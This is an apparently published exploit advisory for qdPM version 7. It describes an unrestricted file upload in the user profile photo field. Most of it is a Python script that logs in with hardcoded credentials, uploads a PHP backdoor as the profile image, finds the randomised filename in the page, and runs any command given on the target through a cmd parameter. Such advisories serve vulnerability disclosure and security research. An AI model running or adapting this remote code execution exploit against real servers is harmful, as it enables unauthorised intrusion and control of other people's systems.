qdPM 7 Shell Upload

`######################################################################################  
# Exploit qdPM v.7 Arbitrary File upload  
# Date: June 13th 2012  
# Author: loneferret  
# Version: 7  
# Vendor Url: http://qdpm.net/  
# Tested on: Winddows XP / XAMPP  
######################################################################################  
# Discovered by: loneferret  
######################################################################################  
  
# Software description:  
# Free project management tool for small team  
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.  
# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact  
# using a Ticket System that is integrated into Task management.  
  
# Vulnerability:  
# Application does not verify the file's extension when uploading an image for a user's profile.  
# Making it possible to upload a small php shell, and accessing it remotely.  
  
# Note(s):  
# One needs a valid user account to upload the file. (Client will do)  
# No need to be authenticated to access the file.  
  
# Uploading file:  
# Once logged in, upload file here:  
# Page: /qdPM/index.php/home/myAccount  
  
# Access file:  
# File can be found here:  
# /qdPM/uploads/users/<filename>  
#  
# Note the filename will contain a random number. One need to  
# to look at the source code from the browser to find it.  
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />  
  
  
  
----- python script -----  
#!/usr/bin/python  
  
import re, mechanize  
import urllib, sys  
  
print "\n[*] qdPM v.7 Remote Code Execution"  
print "[*] Vulnerability discovered by loneferret"  
  
print "[*] Offensive Security - http://www.offensive-security.com\n"  
if (len(sys.argv) != 3):  
print "[*] Usage: poc.py <RHOST> <RCMD>"  
exit(0)  
  
rhost = sys.argv[1]  
rcmd = sys.argv[2]  
  
# Login into site  
try:  
print "[*] Loging in ."  
br = mechanize.Browser()  
br.open("http://%s/qdPM/index.php/home/login" % rhost)  
assert br.viewing_html()  
br.select_form(name="UsersForm")  
br.select_form(nr=0)  
br.form['login[email]'] = "[email protected]"  
br.form['login[password]'] = "123456"  
print "[*] Hope this works"  
br.submit()  
  
except:  
print "[*] Oups..."  
exit(0)  
  
# Upload malicious file  
try:  
print "[*] Uploading shell .."  
br.open("http://%s/qdPM/home/myAccount" % rhost)  
assert br.viewing_html()  
br.select_form(name="UsersAccountForm")  
br.select_form(nr=0)  
br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")  
br.submit(nr=0)  
  
except:  
print "[-] Upload didn't work."  
exit(0)  
  
# Get file name once saved  
try:  
br.select_form(name="UsersAccountForm")  
for form in br.forms():  
filename = form.controls[9].value  
print "[*] Filename is now: " + filename  
  
url = "http://%s/qdPM/uploads/users " % rhost  
url += "/%s?cmd=%s" % (filename,rcmd)  
print "[*] Executing command:\n"  
resp = urllib.urlopen(url)  
print resp.read()  
  
except:  
print "[-] Oups..."  
exit(0)  
  
  
`